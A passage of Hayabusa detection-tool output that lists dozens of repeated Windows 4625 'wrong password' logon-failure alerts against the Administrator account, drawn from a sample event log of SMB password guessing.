NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSXqaP0i1eeKQOmX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gke4vfzIAC3k0yXU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZnjxfeIX4ra6vmBA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ChR30FLLOT3Pvapv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VkepVf00vkpVp9yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5i2AxYxwCX6DvP3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8Fvcw2mQBI61mxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eAazyOpBig2G3Z78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1g3rjPQQAXEK2yz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BC68zrAEF6L00xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8xD2aZArxVdrO6fG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHJN2mJgwQEZhXBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: untyxmsmYrfRlHcu : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eOc2R5V6p9VBsYI2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5Ld2NDMjbY3tiT7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ykdbglaCU82nRvk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tDGrsVIC5qVEwC6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UouNQa3EkcsMICiO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u0exIftdu0qPLrRC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q5mMNIdJj0BItrv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pb2cVBffdBlwwGQP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p2FbHoSFFdnM4wH7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RAbCN4xKDDlhmrkU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxBwuSDdNZlE2F96 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M3JkwIQF7yV42rOP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6QiHHeHeY8yWOiJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rhzpo2bEgpJCB51w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuyPyMMT4wQhLIEz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: no5bOZf3SEsrETun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBTHVleOipnyVFIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JNFE2jNifGI7pELk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LgkAKJ57rYqCdbew : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: daKQcllU63lW4ypy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GBSPSAoEBS7JRYuf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94bI5pb8CGjY3QZD : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1obedLuMFlHlSvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EPn1yJV358YAFALV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qA7N5DMAJqNYkumM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Lk95NYGG5iLBFBw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x3DDtXECsK61pIYy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rt8bfBDTV5wYfBO4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uTYMgN5kmFpyj7xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmyF6j61wosCE0sg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fd61fJBRizl2AIGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDIFX7lsmGqSGvkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVmto6S25gU2bkwa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7QMbzSuGuzzMK0v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJUynF5bN1Oj0vaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dg4ZtybY5BnPN0nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gRmRV9ct3hor8Muk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QRjaP1mj9FgKsGBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CCzzatQ195mcxQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJPIrtk5GBAhsUlR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 720RHwyXQcxvsJBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GofmHRstuhljMDOL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wQUQ4INktwXwRkaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8WHs5hduf7SmUcLK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gdo1txjJXiRLbUDH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JK8jP3ftKQOyutGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DdbEjo88dBJRhrKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZCVkXkwhbuSM654 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z2mc9WScfBa88rtO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lee7qYLkXQoz8rRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g1ZKpZuZU1WRoC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4ST7RrHJxAQHHbn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GtW1hBHF97YqvN4N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVKlPytPofO9LQBm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GOkZ9yjvfL51UYXo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAxfxSbRqGO7Dej0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D7XmvDYk6zFLir09 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mWcl6CKdSMxd8edZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SxBQlFZvGBqDdobn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXN94VanwME6q8rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
